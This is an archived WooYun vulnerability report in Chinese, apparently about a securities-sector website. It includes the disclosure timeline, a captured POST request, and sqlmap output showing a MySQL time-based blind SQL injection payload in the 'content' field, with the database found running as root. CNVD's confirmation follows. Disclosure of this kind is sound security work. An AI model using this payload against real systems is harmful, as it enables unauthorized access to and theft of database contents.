乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-24: 细节已通知厂商并且等待厂商处理中 2015-09-29: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-10-09: 细节向核心白帽子及相关领域专家公开 2015-10-19: 细节向普通白帽子公开 2015-10-29: 细节向实习白帽子公开 2015-11-13: 细节向公众公开
RT
在提交建议处抓包
POST /postsystem/saveInquiry HTTP/1.1Host: **.**.**.**User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: http://**.**.**.**/callCenter/3Content-Length: 9Cookie: PHPSESSID=f3e2ca833k3v0m189rcbs7ke95; PHPSESSID=f3e2ca833k3v0m189rcbs7ke95Connection: keep-alivePragma: no-cacheCache-Control: no-cachecontent=1
数据
Place: POSTParameter: content Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: content=1' AND SLEEP(5) AND 'roLd'='roLd---[12:20:56] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.3.29back-end DBMS: MySQL 5.0.11[12:20:56] [INFO] fetching current user[12:20:56] [INFO] resumed: root@localhostcurrent user: 'root@localhost'
[INFO] retrieved:5[12:21:23] [INFO] retrieved: information_schema[12:27:49] [INFO] retrieved: ******************************************************8
危害等级:中
漏洞Rank:10
确认时间:2015-09-29 09:44
CNVD确认并复现所述情况,已经转由CNCERT向证券业信息化主管部门通报,由其后续协调网站管理单位处置.
暂无